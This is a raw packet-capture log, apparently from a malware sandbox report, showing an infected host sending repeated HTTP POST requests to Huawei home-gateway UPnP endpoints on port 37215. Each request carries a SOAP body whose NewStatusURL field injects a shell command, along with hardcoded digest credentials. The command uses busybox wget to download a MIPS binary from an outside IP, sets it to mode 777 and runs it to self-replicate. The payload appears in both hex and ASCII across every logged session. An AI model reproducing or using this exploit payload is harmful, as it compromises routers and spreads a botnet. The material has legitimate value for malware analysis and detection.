                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2846192.168.2.2352304157.154.250.5637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651063919 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2847192.168.2.2340210128.214.113.3037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651139975 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2848192.168.2.2346134157.50.234.17037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651173115 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2849192.168.2.2355870197.77.237.9137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651186943 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2850192.168.2.2342344197.146.145.1237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651186943 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2851192.168.2.2348312148.134.62.24137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651194096 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2852192.168.2.2352562153.181.86.1437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651202917 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2853192.168.2.2358416194.223.106.25437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651257992 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2854192.168.2.235431241.86.122.3837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651257992 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2855192.168.2.235306041.163.99.12637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651350021 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
